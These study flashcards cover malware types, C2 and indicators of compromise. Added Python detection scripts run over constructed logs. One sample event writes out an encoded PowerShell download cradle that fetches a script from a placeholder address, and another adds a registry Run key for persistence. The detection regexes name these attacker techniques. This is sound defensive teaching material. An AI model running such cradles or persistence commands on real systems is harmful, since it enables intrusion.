Topic 13A Flashcards

1
Q

Malware

A

Software that serves a malicious purpose, typically installed without the user’s consent (or knowledge).

2
Q

Trojan

A

Malware concealed within an installer package for software that appears to be legitimate. A Trojan does not seek any type of consent for installation and is actively designed to operate secretly.

3
Q

Potentially unwanted programs (PUPs)/Potentially unwanted applications (PUAs)

A

Software installed alongside a package selected by the user, or perhaps bundled with a new computer system. Unlike a Trojan, the presence of a PUP is not automatically regarded as malicious. It may have been installed without active consent, or with consent obtained through a purposefully confusing license agreement.

Also known as grayware or bloatware.

4
Q

The payload

A

An action performed by the malware other than simply replicating or persisting on a host. Examples of payload classifications include spyware, rootkit, remote access Trojan (RAT), and ransomware.

5
Q

Virus

A

Aims to replicate and spread from computer to computer by infecting files and programs.

A virus is executed only when the user performs an action, such as downloading and running an infected executable, attaching an infected USB stick, or opening an infected document with macros or scripting enabled.

6
Q

Non-resident/file infector virus

A

Contained within a host executable file and runs as part of the host process. The virus tries to infect other process images on persistent storage and performs other payload actions, then passes control back to the host program.

7
Q

Memory resident virus

A

When the host file is executed, the virus creates a new process for itself in memory. The malicious process remains in memory even after the host process is terminated.

8
Q

Boot

A

The virus code is written to the boot sector or partition table of a fixed disk or USB media and executes as a memory-resident process when the OS starts or the media is attached to the computer.

9
Q

Script and macro viruses

A

The malware uses the programming features available in local scripting engines for the OS and/or browser, such as PowerShell, Windows Management Instrumentation (WMI), JavaScript, Microsoft Office documents with Visual Basic for Applications (VBA) code enabled, or PDF documents with JavaScript enabled.

10
Q

multipartite

A

Describes viruses that use multiple infection vectors, for example infecting both the boot sector and executable files.

11
Q

polymorphic

A

Describes viruses that dynamically change or obfuscate their code with each infection to evade signature-based detection.

12
Q

computer worm

A

Memory-resident malware that can run without user intervention and replicate over network resources.

Can execute by exploiting a vulnerability in a process when the user browses a website, runs a vulnerable server application, or is connected to an infected file share.

Rapidly consumes network bandwidth as it replicates.

May also crash an operating system or server application, performing a denial of service attack.

Can carry a payload written to perform any type of malicious action.

13
Q

Fileless malware

A

Malware that does not write its executable code to disk as a conventional file. It uses memory-resident techniques to run in its own process, within a host process or dynamic link library (DLL), or within a scripting host. "Fileless" does not mean there is no disk activity at all: the malware typically still modifies registry values (for example, storing an encoded script in a registry key that an autorun entry launches) to achieve persistence.

Often uses lightweight shellcode to create a backdoor. Shellcode is easy to obfuscate to evade signature-based detection, and the backdoor can then download additional packages, which are obfuscated as well.

May use "living off the land" techniques rather than compiled executables to evade detection: the malware uses legitimate system scripting tools, notably PowerShell and Windows Management Instrumentation (WMI), to execute payload actions. Because these tools are already present and trusted on the host, the attacker needs to drop little or nothing of their own onto the system.
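As an added example (not part of the original flashcards), the Python script below turns the fileless and living-off-the-land indicators just described into detection rules and runs them over constructed process-creation events, the kind of data Sysmon Event ID 1 or Windows Security event 4688 record. The image paths, the 203.0.113.10 address and the encoded script are invented sample data, and the regular expressions and rule set are this example's own assumptions rather than any vendor's detection content.

```python
"""Flag living-off-the-land and fileless-malware indicators in process-creation
events. Added example; all events below are constructed, not real telemetry."""
import base64
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# -EncodedCommand (and its short forms) takes a base64 blob of UTF-16LE script.
ENCODED_FLAG = re.compile(
    r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Download cradles pull a second stage straight into memory, never to disk.
CRADLE = re.compile(
    r"Invoke-Expression|\bIEX\b|DownloadString|Net\.WebClient|Invoke-WebRequest"
    r"|\biwr\b|Start-BitsTransfer", re.I)
# A hidden window or execution-policy bypass is rare in legitimate admin use.
STEALTH = re.compile(r"-(?:w|windowstyle)\s+hidden|-(?:ep|executionpolicy)\s+bypass", re.I)
# Writes to the Run/RunOnce keys are the classic registry persistence step.
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(?:Once)?\b", re.I)
REG_WRITE = re.compile(r"\breg(?:\.exe)?\s+add\b|Set-ItemProperty|New-ItemProperty", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if there is none."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_event(event):
    """Return the list of reasons an event looks like LOLBin/fileless activity."""
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    image = event["image"].rsplit("\\", 1)[-1].lower()
    cmd = event["command_line"]
    reasons = []
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded PowerShell command")
        cmd = cmd + " " + decoded  # inspect the decoded script as well
    if CRADLE.search(cmd):
        reasons.append("download cradle / in-memory execution")
    if STEALTH.search(cmd):
        reasons.append("hidden window or execution-policy bypass")
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        reasons.append(f"Office application {parent} spawned {image}")
    if parent == "wmiprvse.exe" and image in SCRIPT_HOSTS:
        reasons.append(f"WMI provider host spawned {image}")
    if image == "wmic.exe" and re.search(r"process\s+call\s+create", cmd, re.I):
        reasons.append("WMI used to launch a process")
    if RUN_KEY.search(cmd) and REG_WRITE.search(cmd):
        reasons.append("write to registry Run key (persistence)")
    return reasons


def scan(events):
    """Return (index, reasons) for every event that triggered at least one rule."""
    return [(i, r) for i, e in enumerate(events) if (r := analyse_event(e))]


def _encode(script):
    """Build the -EncodedCommand form of a script, as an attacker would."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed sample events (paths, users and the 203.0.113.10 address are invented).
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "command_line": r"notepad.exe C:\Users\alice\notes.txt"},
    {"parent_image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -enc " + _encode(
         "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/s.ps1')")},
    {"parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run'
                     r' /v Updater /t REG_SZ /d "C:\Users\alice\AppData\Roaming\u.vbs"'},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoProfile -Command Get-Process"},
]

if __name__ == "__main__":
    for index, reasons in scan(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index]["image"].rsplit("\\", 1)[-1], reasons)
```

The second event (Word spawning a hidden PowerShell with an encoded download cradle) and the third (WMI spawning cmd.exe to add a Run key) are flagged; the plain notepad launch and the ordinary `powershell -NoProfile -Command Get-Process` are not, which is why `-NoProfile` alone is deliberately not treated as a stealth indicator. Note that the decoded script is scanned too: obfuscating the cradle behind `-enc` does not hide it from the rule.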

14
Q

Bloatware and malware can be used for different levels of monitoring:

A

Tracking cookies - a cookie is a plaintext file, not malware, but if permitted by browser settings, third-party cookies can be used to record web activity, track the user's IP address, and harvest various other metadata.

Supercookies and beacons - a supercookie stores tracking data in a non-standard location, such as the browser cache, so that it is not flagged or cleared as a cookie. A beacon is a single-pixel image embedded in a web page; although invisible, the browser still requests it from the tracking server, which allows the beacon to collect data about the request.

Adware - bloatware that performs browser reconfigurations, such as allowing tracking cookies, changing the default search provider, opening sponsors' pages at startup, adding bookmarks, and so on.

Spyware - malware that can perform adware-like tracking, but can also monitor local application activity, take screenshots, activate recording devices such as a microphone or webcam, and perform DNS redirection.

Keylogger - spyware that actively attempts to steal confidential information by recording keystrokes. The attacker will usually hope to discover passwords or credit card data.

15
Q

remote access Trojan (RAT)

A

Backdoor malware that mimics the functionality of legitimate remote control programs but is designed specifically to operate covertly.

16
Q

A bot

A

An automated script or tool that performs some malicious activity.

17
Q

Botnet

A

A group of bots that are all under the control of the same malware instance and can be manipulated together.

Common uses include triggering distributed denial of service (DDoS) attacks, launching spam campaigns, and performing cryptomining.

18
Q

command and control (C2 or C&C) host or network

A

The infrastructure of hosts and services with which attackers direct, distribute, and control malware over botnets.

Identifying C2 traffic (for example, regular check-ins from an internal host to an external server) is usually the best way to detect the presence of a RAT, backdoor, or bot.

19
Q

IRC

A

Internet Relay Chat.

A group communications protocol that enables users to chat, send private messages, and share files. Historically a common channel for botnet C2.

Modern methods are more likely to embed command sequences in HTTPS or DNS traffic, which blends in with legitimate activity.
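Because modern C2 hides inside ordinary-looking HTTPS and DNS traffic, detection relies on the shape of the traffic rather than the protocol. The Python script below, an added example that is not part of the original flashcards, applies two such heuristics to constructed logs: periodic beaconing (many connections to one destination at near-constant intervals) and DNS tunnelling (many long, high-entropy subdomains under one domain). The addresses, the `updates-cdn.net` domain, and the thresholds are this example's own assumptions; the "registered domain equals the last two labels" shortcut is an assumption that a public-suffix list would refine.

```python
"""Two heuristics for spotting C2 hidden in HTTPS and DNS traffic.
Added example; the logs below are constructed, not captured traffic."""
from collections import defaultdict
from datetime import datetime, timedelta
import math
import statistics


def find_beacons(conn_log, min_count=6, max_cv=0.15):
    """Flag flows with many connections at near-constant intervals.

    conn_log rows are (timestamp, src, dst, dport). A low coefficient of
    variation (stdev / mean) of the inter-connection gaps is the beacon
    signature; browsing produces bursty, irregular gaps instead.
    """
    by_flow = defaultdict(list)
    for ts, src, dst, dport in conn_log:
        by_flow[(src, dst, dport)].append(ts)
    hits = []
    for flow, times in by_flow.items():
        if len(times) < min_count:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean > 0 else float("inf")
        if cv <= max_cv:
            hits.append((flow, round(mean, 1), round(cv, 3)))
    return hits


def shannon_entropy(s):
    """Bits of entropy per character; random-looking labels score high."""
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def find_dns_tunnels(dns_log, min_queries=5, min_label_len=10, min_entropy=3.0):
    """Flag (client, domain) pairs that query many long, high-entropy subdomains.

    dns_log rows are (client, qname). The registered domain is approximated
    as the last two labels (assumption; a public-suffix list is more accurate).
    """
    per_domain = defaultdict(set)
    for client, qname in dns_log:
        labels = qname.lower().rstrip(".").split(".")
        if len(labels) < 3:
            continue
        per_domain[(client, ".".join(labels[-2:]))].add(".".join(labels[:-2]))
    hits = []
    for key, subs in per_domain.items():
        if len(subs) < min_queries:
            continue
        avg_len = statistics.mean([len(s) for s in subs])
        avg_ent = statistics.mean([shannon_entropy(s) for s in subs])
        if avg_len >= min_label_len and avg_ent >= min_entropy:
            hits.append((key, len(subs), round(avg_ent, 2)))
    return hits


# Constructed logs: 10.0.0.5 beacons to 203.0.113.10:443 about every 60 s
# (with a little jitter) while also browsing 198.51.100.7 at irregular times.
_BASE = datetime(2024, 3, 1, 9, 0, 0)
CONN_LOG = sorted(
    [(_BASE + timedelta(seconds=60 * i + (i % 3) - 1), "10.0.0.5", "203.0.113.10", 443)
     for i in range(10)]
    + [(_BASE + timedelta(seconds=s), "10.0.0.5", "198.51.100.7", 443)
       for s in (0, 4, 9, 70, 71, 300, 301, 302, 900, 1500)]
)
DNS_LOG = [("10.0.0.5", q) for q in (
    "www.example.com", "mail.example.com", "cdn.example.com",
    # tunnel-style queries: data encoded into the leftmost label
    "k3j9x2q8w1m5b7v0.updates-cdn.net", "p6t4z1r9y3n0c8f2.updates-cdn.net",
    "d7h2l5s8a1e4g9u3.updates-cdn.net", "m0q7w4x1z8k5j2y9.updates-cdn.net",
    "b5n8c2v9t6r3p0f1.updates-cdn.net", "g4a7e0i3o6u9s2h5.updates-cdn.net",
)]

if __name__ == "__main__":
    print("beacons:", find_beacons(CONN_LOG))
    print("dns tunnels:", find_dns_tunnels(DNS_LOG))
```

On the constructed data the beacon flow is reported with a 60 s mean gap and a coefficient of variation of about 0.02, while the browsing flow, with the same number of connections, has irregular gaps and is ignored; the `updates-cdn.net` queries are flagged because every leftmost label is long and has about 4 bits of entropy per character, whereas `www`, `mail` and `cdn` do not. Real implants add jitter and sleep, so the `max_cv` and `min_count` thresholds need tuning per environment.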

20
Q

Can trojan malware access privileges beyond the user account it infects?

A

No. A Trojan runs with the privileges of the user account that executed it; it cannot gain further privileges unless it also exploits a separate privilege escalation vulnerability.

21
Q

What level do critical processes run at?

A

SYSTEM (on Windows, the local system account, which has the highest level of privilege on the host).

22
Q

Can trojans installed or executed with local admin privileges conceal their presence entirely?

A

Not entirely. The Trojan will still show up as a running process or service. Often the process image name is chosen to resemble a genuine executable or library to avoid detection.

23
Q

How can a payload execute without requiring authorization using SYSTEM privileges?

A

The malware can be delivered as the payload for an exploit of a severe vulnerability in a process that already runs as SYSTEM, so no user authorization is involved.

Alternatively, the malware may be able to use an exploit to escalate privileges to SYSTEM level after installation.

24
Q

Rootkit

A

Malware running at the SYSTEM (or kernel) level, which gives it the privileges needed to hide its own presence from the operating system and its tools.

25
Q

What can a rootkit do?

A

In theory, anything. Enforced driver code signing can be used to prevent unsigned rootkit code from loading into the kernel.

It can compromise system files and programming interfaces, so that local shell processes, such as Explorer, taskmgr, or tasklist on Windows or ps or top on Linux, plus socket-listing tools such as netstat, no longer reveal its presence (at least, if run from the infected machine).

A rootkit may also contain tools for cleaning system logs, further concealing its presence.

26
Q

Examples of ransomware:

A

Will display threatening messages, such as claiming that Windows must be reactivated or that the computer has been locked by the police because it was used to view child pornography or for terrorism.

27
Q

Crypto-Ransomware

A

Encrypts files and holds them hostage until the victim pays for the key needed to decrypt them.

28
Q

Logic bomb

A

A malicious program or script that is set to run under particular circumstances or in response to a defined event.

A typical example is a disgruntled systems administrator who leaves a scripted trap that runs if their account is deleted or disabled.

Antivirus is unlikely to detect this, because until it is triggered the script looks like any other administrative script. Also known as a mine.

29
Q

Time bomb

A

Having infected a system, a time bomb waits for a preconfigured time or date before running its payload.

30
Q

tactic, technique, or procedure (TTP):

A

Tactic - high level description of a threat behavior. Behaviors such as reconnaissance, persistence, and privilege escalation are examples of tactics.

Technique - intermediate-level description of how a threat actor progresses a tactic. For example, reconnaissance might be accomplished via techniques such as active network scanning, vulnerability scanning, and email harvesting.

Procedure - detailed description of how a technique is performed. For example, a particular threat actor might use a particular tool in a distinctive way to perform vulnerability scanning.

31
Q

indicator of compromise (IoC)

A

A residual sign that an asset or network has been successfully attacked or is continuing to be attacked. Put another way, an IoC is evidence of a TTP.

Examples include files made inaccessible and disabled system recovery options.

32
Q

sheep dip

A

an isolated host used to test new software and removable media for malware indicators before it is authorized on the production network.

33
Q

What can Abnormal resource consumption be a sign of?

A

Malware activity

34
Q

Blocked content

A

A potential indicator of malicious activity where audit logs show unauthorized attempts to read or copy a file or other data.

35
Q

Resource inaccessibility

A

A file or service is made inaccessible.

This is a typical indicator of a denial of service attack.

36
Q

The following indicators can reveal suspicious account behavior:

A

Account lockout - can indicate repeated failed sign-in attempts against the account, such as password guessing.

Concurrent session usage - this indicates that the threat actor has obtained the account credentials and is signed in on another workstation at the same time as the legitimate user.

Impossible travel - this indicates that the threat actor is attempting to use remote access to sign in to an account from a geographic location that the user could not physically have reached in the time since their last sign-in.
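As an added example (not part of the original flashcards), the Python script below evaluates all three account-behaviour indicators over a constructed sign-in log. The user names, source addresses, session IDs and coordinates are invented, and the thresholds (five failures in ten minutes, 1000 km/h) are this example's own assumptions; a geo-IP lookup is assumed to have already supplied the latitude and longitude for each event.

```python
"""Account-behaviour indicators: lockout, concurrent sessions, impossible travel.
Added example; the sign-in log below is constructed, not real data."""
from collections import defaultdict
from datetime import datetime, timedelta
import math

EARTH_RADIUS_KM = 6371.0


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points given in decimal degrees."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = p2 - p1
    dlmb = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * EARTH_RADIUS_KM * math.asin(math.sqrt(a))


def lockout_candidates(events, threshold=5, window=timedelta(minutes=10)):
    """Users with at least `threshold` failed sign-ins inside any sliding window."""
    failures = defaultdict(list)
    for e in events:
        if e["action"] == "failure":
            failures[e["user"]].append(e["ts"])
    flagged = []
    for user, times in failures.items():
        times.sort()
        for i in range(len(times) - threshold + 1):
            if times[i + threshold - 1] - times[i] <= window:
                flagged.append(user)
                break
    return flagged


def concurrent_sessions(events):
    """Pairs of overlapping sessions for one user from different source IPs."""
    sessions = {}
    for e in sorted(events, key=lambda ev: ev["ts"]):
        if e["action"] == "logon":
            sessions[e["session"]] = {"user": e["user"], "ip": e["ip"],
                                      "start": e["ts"], "end": datetime.max}
        elif e["action"] == "logoff" and e["session"] in sessions:
            sessions[e["session"]]["end"] = e["ts"]
    ids = sorted(sessions)
    pairs = []
    for i, a in enumerate(ids):
        for b in ids[i + 1:]:
            sa, sb = sessions[a], sessions[b]
            if (sa["user"] == sb["user"] and sa["ip"] != sb["ip"]
                    and sa["start"] < sb["end"] and sb["start"] < sa["end"]):
                pairs.append((sa["user"], a, b))
    return pairs


def impossible_travel(events, max_kmh=1000.0):
    """Consecutive sign-ins by one user that imply an implausible travel speed."""
    last = {}
    hits = []
    for e in sorted(events, key=lambda ev: ev["ts"]):
        if e["action"] != "logon":
            continue
        prev = last.get(e["user"])
        if prev is not None:
            km = haversine_km(prev["lat"], prev["lon"], e["lat"], e["lon"])
            hours = (e["ts"] - prev["ts"]).total_seconds() / 3600
            # Two sign-ins at the same instant from distant places is also impossible.
            if km > 0 and (hours == 0 or km / hours > max_kmh):
                hits.append((e["user"], prev["ip"], e["ip"], round(km), round(hours, 2)))
        last[e["user"]] = e
    return hits


def _ev(user, action, ts, ip, lat, lon, session=None):
    return {"user": user, "action": action, "ts": datetime.fromisoformat(ts),
            "ip": ip, "lat": lat, "lon": lon, "session": session}


# Constructed log. alice works from New York; at 10:30 her credentials are used
# from Kyiv while her desk session is still open. bob signs in from New York and
# again from Los Angeles twelve hours later, which is ordinary travel. carol's
# account is being password-guessed.
SIGNIN_LOG = [
    _ev("alice", "logon", "2024-03-01T09:00:00", "10.0.0.5", 40.71, -74.01, "s1"),
    _ev("bob", "logon", "2024-03-01T08:00:00", "10.0.0.9", 40.71, -74.01, "s2"),
    _ev("bob", "logoff", "2024-03-01T16:00:00", "10.0.0.9", 40.71, -74.01, "s2"),
    _ev("alice", "logon", "2024-03-01T10:30:00", "203.0.113.9", 50.45, 30.52, "s3"),
    _ev("alice", "logoff", "2024-03-01T17:00:00", "10.0.0.5", 40.71, -74.01, "s1"),
    _ev("bob", "logon", "2024-03-01T20:00:00", "198.51.100.22", 34.05, -118.24, "s4"),
] + [_ev("carol", "failure", f"2024-03-01T11:0{i}:00", "198.51.100.40", 40.71, -74.01)
     for i in range(6)]

if __name__ == "__main__":
    print("lockout candidates:", lockout_candidates(SIGNIN_LOG))
    print("concurrent sessions:", concurrent_sessions(SIGNIN_LOG))
    print("impossible travel:", impossible_travel(SIGNIN_LOG))
```

The same Kyiv sign-in trips two indicators at once: it overlaps alice's still-open New York session from a different address, and it implies roughly 7500 km covered in 90 minutes. bob's New York to Los Angeles pair, about 3900 km in twelve hours, stays under the speed threshold and his sessions do not overlap, so nothing is raised for him.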

37
Q

A threat actor will often try to cover their tracks by removing indicators from log files:

A

Missing logs - this could mean that the log file has been deleted. As this is easy to detect, a more sophisticated threat actor will remove individual log entries instead. This might be indicated by unusual gaps between log entry times. The most sophisticated type of attack spoofs log entries to conceal the malicious activity.

Out-of-cycle logging - a threat actor might also manipulate the system time or change log entry timestamps as a means of hiding activity. Entries whose timestamps are out of sequence with those around them are the indicator.
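As an added example (not part of the original flashcards), the Python script below checks a constructed, Windows-event-style log for both indicators: gaps in the record ID sequence and unusual gaps in entry times point to deleted entries, and a timestamp that runs backwards relative to the entries around it points to out-of-cycle logging. The `EventRecordID=... Time=... Msg=...` line format, the entries, and the "ten times the median gap" threshold are this example's own assumptions.

```python
"""Detect deleted and out-of-cycle log entries.
Added example; the log lines below are constructed, not a real system's log."""
import re
import statistics
from datetime import datetime

LINE = re.compile(r"EventRecordID=(\d+)\s+Time=(\S+)\s+Msg=(.*)")


def parse(lines):
    """Turn 'EventRecordID=5 Time=... Msg=...' lines into (id, timestamp, msg)."""
    entries = []
    for line in lines:
        m = LINE.match(line.strip())
        if m:
            entries.append((int(m.group(1)), datetime.fromisoformat(m.group(2)), m.group(3)))
    return entries


def missing_record_ids(entries):
    """Gaps in the monotonically increasing record ID reveal deleted entries."""
    ids = sorted(rid for rid, _, _ in entries)
    return [(a + 1, b - 1) for a, b in zip(ids, ids[1:]) if b - a > 1]


def time_anomalies(entries, factor=10.0):
    """Return (unusual_gaps, backwards).

    unusual_gaps: (prev_id, id, seconds) where the gap exceeds `factor` times
    the median gap, the "unusual gaps between log entry times" indicator.
    backwards: record IDs whose timestamp precedes the previous in-order entry,
    the "out-of-cycle" indicator of clock or timestamp manipulation. A
    backwards entry is not used as the baseline for the next gap, so one
    manipulated timestamp does not also produce a spurious large gap.
    """
    ordered = sorted(entries, key=lambda e: e[0])
    gaps, backwards = [], []
    prev = None
    for rid, ts, _ in ordered:
        if prev is not None:
            delta = (ts - prev[1]).total_seconds()
            if delta < 0:
                backwards.append(rid)
                continue
            gaps.append((prev[0], rid, delta))
        prev = (rid, ts)
    if not gaps:
        return [], backwards
    median = statistics.median([d for _, _, d in gaps])
    unusual = [g for g in gaps if median > 0 and g[2] > factor * median]
    return unusual, backwards


# Constructed log: records 6-8 have been removed (leaving a 41-minute hole
# between records 5 and 9) and record 11 carries a backdated timestamp.
SAMPLE_LINES = """
EventRecordID=1 Time=2024-03-01T09:00:00 Msg=Service started
EventRecordID=2 Time=2024-03-01T09:01:05 Msg=Logon alice
EventRecordID=3 Time=2024-03-01T09:02:00 Msg=Scheduled task ran
EventRecordID=4 Time=2024-03-01T09:03:10 Msg=Logon bob
EventRecordID=5 Time=2024-03-01T09:04:00 Msg=Policy refresh
EventRecordID=9 Time=2024-03-01T09:45:00 Msg=Policy refresh
EventRecordID=10 Time=2024-03-01T09:46:00 Msg=Logoff bob
EventRecordID=11 Time=2024-03-01T09:20:00 Msg=Service stopped
EventRecordID=12 Time=2024-03-01T09:47:05 Msg=Scheduled task ran
EventRecordID=13 Time=2024-03-01T09:48:00 Msg=Logoff alice
"""

if __name__ == "__main__":
    log = parse(SAMPLE_LINES.splitlines())
    print("missing record IDs:", missing_record_ids(log))
    unusual, backwards = time_anomalies(log)
    print("unusual gaps:", unusual)
    print("backwards timestamps:", backwards)
```

Against the sample the ID check reports records 6 to 8 as missing, the gap check reports the 2460-second hole between records 5 and 9 (the other gaps are around a minute), and record 11 is reported as out of cycle. The record ID check is the more robust of the two: the timing check depends on a steady baseline rate and is easily fooled on a quiet host, whereas a hole in a sequence number cannot be explained by inactivity.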